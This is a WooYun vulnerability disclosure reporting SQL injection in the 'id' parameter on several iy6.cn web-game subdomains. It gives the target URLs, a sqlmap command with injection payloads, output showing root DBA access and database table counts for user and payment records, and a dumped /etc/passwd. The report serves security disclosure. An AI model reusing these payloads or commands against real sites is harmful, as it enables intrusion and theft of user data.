当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144449

漏洞标题:某网页游戏所有子游戏多处同样参数SQL注入漏洞(DBA权限+几十万用户数据泄露+读取任意文件)

相关厂商:爱游乐

漏洞作者: 路人甲

提交时间:2015-10-02 10:57

修复时间:2015-11-16 10:58

公开时间:2015-11-16 10:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

同样的参数存在注入!~~~

详细说明:

注入点如:

http://zxy.iy6.cn/?action=detail&id=85
http://jjsg.iy6.cn/?action=detail&id=4825
http://xyfm.iy6.cn/?action=detail&id=2935
http://wj.iy6.cn/?action=detail&id=3581
http://rxhzw.iy6.cn/?action=detail&id=26
http://wj2.iy6.cn/?action=detail&id=3226
http://smsg.iy6.cn/?action=detail&id=2946
http://xyfm.iy6.cn/?action=detail&id=2935
……


等等还有很多,以第一个为例
http://zxy.iy6.cn/?action=detail&id=85
sqlmap测试

sqlmap.py -u "http://zxy.iy6.cn/?action=detail&id=85" --dbms "MySQL" --current-db --current-user --is-dba --hostname


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=detail&id=85) AND 9543=9543 AND (7966=7966
    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: action=detail&id=-8903) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71
776a6971,0x484e58444e4164536669,0x7167737171),NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=detail&id=85) AND SLEEP(5) AND (3740=3740
---
[19:50:14] [INFO] testing MySQL
[19:50:14] [INFO] confirming MySQL
[19:50:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[19:50:14] [INFO] fetching current user
current user:    'root@localhost'
[19:50:15] [INFO] fetching current database
current database:    'iy6'
[19:50:15] [INFO] fetching server hostname
hostname:    'localhost.localdomain'
[19:50:15] [INFO] testing if current user is DBA
[19:50:15] [INFO] fetching current user
current user is DBA:    True
database management system users [6]:
[*] ''@'localhost.localdomain'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'c65mini.localdomain'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
available databases [7]:
[*] information_schema
[*] iy6
[*] mysql
[*] performance_schema
[*] qihihi
[*] qq990test
[*] test
Database: qq990test
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| kmy_member                      | 527473  |			50多万用户
| kmy_member_login_game_record    | 106896  |		10多万登录记录
| kmy_z_game_card                 | 48793   |			几万游戏卡
| kmy_z_card_record               | 32676   |
| kmy_operationlog                | 9329    |
| kmy_game_charge_record          | 5497    |
| kmy_game_server                 | 5235    |
| kmy_pay_record                  | 4916    |			几千付款记录
| kmy_news                        | 3359    |
| kmy_platform_money_record       | 3060    |
| kmy_access                      | 1582    |
| kmy_kaifu                       | 1263    |
| kmy_loginlog                    | 798     |			登陆记录
| kmy_menu                        | 635     |
| kmy_fail_charge                 | 336     |
| kmy_member_copy                 | 204     |
| kmy_game_charge_retry           | 201     |
| kmy_z_card_type                 | 199     |
| kmy_z_charge_record             | 131     |
| kmy_z_charge_username           | 130     |
| kmy_tg_link                     | 121     |
| kmy_findpwd_record              | 86      |			找回密码记录
| kmy_game_pic                    | 77      |
| kmy_game                        | 67      |
| kmy_game_leftmenu               | 47      |
| kmy_friend_link                 | 33      |
| kmy_pay_type                    | 23      |
| kmy_faq                         | 22      |
| kmy_user                        | 15      |			管理用户
| kmy_pic                         | 13      |
| kmy_cache                       | 9       |
| kmy_single_page                 | 8       |
| kmy_role                        | 6       |
| kmy_tg_member                   | 4       |			推广成员
| kmy_notification                | 2       |
| kmy_config                      | 1       |
+---------------------------------+---------+
Database: iy6
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| kmy_z_game_card                 | 66960   |			六万游戏卡
| kmy_member_login_game_record    | 31457   |
| kmy_member                      | 19818   |			将近两万用户
| kmy_operationlog                | 17571   |
| kmy_pay_record                  | 14445   |			一万多付款记录
| kmy_game_charge_record          | 9640    |
| kmy_z_card_record               | 6665    |
| kmy_news                        | 4562    |
| kmy_game_server                 | 4298    |
| kmy_kaifu                       | 3927    |
| kmy_platform_money_record       | 2939    |
| kmy_member_server_rolename      | 2741    |
| kmy_access                      | 1825    |
| kmy_z_charge_username           | 1722    |
| kmy_z_charge_record             | 1525    |
| kmy_loginlog                    | 1374    |			登陆记录
| kmy_menu                        | 849     |
| kmy_tg_link                     | 628     |
| kmy_game_pic                    | 193     |
| kmy_z_card_type                 | 135     |
| kmy_game                        | 94      |
| kmy_game_leftmenu               | 81      |
| kmy_findpwd_record              | 51      |
| kmy_friend_link                 | 51      |
| kmy_game_charge_retry           | 44      |
| kmy_tg_memberlink_change_record | 41      |
| kmy_tg_member                   | 32      |			推广用户
| kmy_faq                         | 21      |
| kmy_pay_type                    | 19      |
| kmy_user                        | 18      |			管理用户
| kmy_pic                         | 13      |
| kmy_cache                       | 9       |
| kmy_single_page                 | 8       |
| kmy_role                        | 5       |
| kmy_notification                | 2       |
| kmy_config                      | 1       |
+---------------------------------+---------+
Database: qihihi
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| pre_userplaygamelog             | 1393154 |			一百多万用户记录
| pre_z_game_card                 | 112471  |			十几万游戏卡
| pre_user                        | 81905   |			八万多用户
| pre_userpingtaibilog            | 37335   |			三万多平台币记录
| pre_card                        | 25281   |
| pre_payorder                    | 23073   |
| pre_longnews                    | 12900   |
| pre_gameserver                  | 7435    |
| pre_kaifubiao                   | 6651    |
| pre_news                        | 6149    |
| pre_z_fail_charge               | 5214    |
| pre_log                         | 3687    |
| pre_longplus                    | 2657    |
| pre_usergetpwdlog               | 1361    |
| pre_paytoolog                   | 1209    |
| pre_z_charge_username           | 513     |
| pre_z_charge_record             | 496     |
| pre_longnewstype                | 375     |
| pre_z_card_type                 | 233     |
| pre_longplustype                | 205     |
| pre_game                        | 93      |
| pre_plus                        | 32      |
| pre_longplustype_copy           | 29      |
| pre_role_user                   | 24      |		
| pre_paytype                     | 22      |		
| pre_link                        | 21      |
| pre_node                        | 16      |
| pre_adminuser                   | 13      |		管理员用户
| pre_access                      | 11      |
| pre_plustype                    | 9       |
| pre_userpingtaibilogtype        | 6       |
| pre_adminaddpingtaibilog        | 5       |
| pre_gameserverstatus            | 5       |
| pre_ads                         | 4       |
| pre_role                        | 4       |
| pre_cpsurl                      | 3       |		?
| pre_newstype                    | 2       |
| pre_adstype                     | 1       |
| pre_cpsuser                     | 1       |		超级管理员?
| pre_linktype                    | 1       |
+---------------------------------+---------+
Database: mysql
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| help_relation                   | 1092    |
| help_topic                      | 535     |
| help_keyword                    | 487     |
| help_category                   | 40      |
| `user`                          | 6       |
| db                              | 2       |
| proxies_priv                    | 2       |
+---------------------------------+---------+


1.jpg


2.jpg


3.jpg


读取任意文件
/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
nginx:x:498:499::/home/nginx:/bin/bash
mysql:x:500:500::/home/mysql:/sbin/nologin

漏洞证明:

1.jpg


2.jpg


3.jpg

修复方案:

过滤
权限限制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:20 (WooYun评价)